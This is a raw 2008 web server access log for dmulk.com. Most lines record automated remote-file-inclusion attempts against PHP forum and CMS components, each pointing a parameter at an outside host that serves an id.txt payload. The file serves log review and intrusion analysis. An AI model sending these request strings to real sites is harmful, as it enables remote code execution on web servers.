80.72.91.58 - - [10/Aug/2008:13:39:06 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:39:06 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:13:39:28 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/memeng/pidMic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:13:39:28 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/memeng/pidMic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:40:01 -0700] "GET /logs/access_080116.log//protection.php?action=logout&siteurl=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:13:40:06 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/memeng/pidMic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:13:40:06 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/memeng/pidMic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:13:40:07 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/memeng/pidMic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:13:40:12 -0700] "GET /logs/access_080216.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/memeng/pidMic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:40:38 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:38 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:38 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:13:40:39 -0700] "GET /?show=gallery&pageid=159 HTTP/1.1" 200 54301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:41 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:42 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:42 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:48 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:49 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:40:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:58 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:58 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:40:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:41:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:13:41:07 -0700] "GET /logs/access_080311.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:13:41:27 -0700] "GET /?show=gallery&pageid=159&nggpage=3 HTTP/1.1" 200 36699 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:42:31 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:42:31 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:42:31 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.137.200.6 - - [10/Aug/2008:13:42:34 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.0" 200 4254533 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1136.JPG&imgrefurl=http://dmulk.com/blog/index.php/feed/%3Fshow%3Dslide&h=2592&w=3888&sz=4155&tbnid=bzknKkT7t666RM:&tbnh=100&tbnw=150&hl=en&prev=/images%3Fq%3Dsiesta%26start%3D180%26imgsz%3Dhuge%26gbv%3D2%26ndsp%3D18%26hl%3Den%26newwindow%3D1%26safe%3Doff%26sa%3DN&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
208.98.1.156 - - [10/Aug/2008:13:42:47 -0700] "GET /logs/access.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:13:42:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:13:42:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:42:56 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:42:57 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:42:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:43:21 -0700] "GET /logs/access_080315.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:43:21 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:43:50 -0700] "GET /logs/access_080207.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:43:51 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:43:52 -0700] "GET /logs/homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:43:52 -0700] "GET /homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:43:53 -0700] "GET /logs/homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:43:53 -0700] "GET /homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:43:56 -0700] "GET /logs/access_080315.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:43:56 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:43:57 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:44:18 -0700] "GET /logs/homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:44:18 -0700] "GET /logs/homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:44:18 -0700] "GET /homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:44:18 -0700] "GET /homepage.php?sel=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:44:23 -0700] "GET /logs/access_080207.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:44:35 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:45:15 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:45:16 -0700] "GET /logs/access_080125.log/contrib/yabbse/poc.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:45:16 -0700] "GET /contrib/yabbse/poc.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.233.63.82 - - [10/Aug/2008:13:45:16 -0700] "GET /logs/contrib/yabbse/poc.php?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:45:16 -0700] "GET /logs//?path%5Bdocroot%5D=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 200 60002 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:45:19 -0700] "GET //?path%5Bdocroot%5D=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 200 18397 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:13:45:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:13:45:37 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [10/Aug/2008:13:45:38 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [10/Aug/2008:13:45:38 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:45:40 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:13:45:43 -0700] "GET /errors.php?error=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:13:45:43 -0700] "GET /logs/errors.php?error=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:45:45 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:13:45:48 -0700] "GET /errors.php?error=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.169.0.50 - - [10/Aug/2008:13:45:48 -0700] "GET /logs/errors.php?error=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:46:24 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:46:24 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.192.70.11 - - [10/Aug/2008:13:46:32 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.thegoodfoot.com/logs/dorid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:46:34 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:46:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 18573 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:46:38 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:46:45 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:46:47 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 18573 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:46:48 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.27.42.86 - - [10/Aug/2008:13:46:53 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:13:46:54 -0700] "GET /logs/errors.php?error=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:13:46:54 -0700] "GET /errors.php?error=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
85.27.42.86 - - [10/Aug/2008:13:46:55 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:46:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.27.42.86 - - [10/Aug/2008:13:46:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:46:58 -0700] "GET /logs/access_080111.log/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:47:01 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
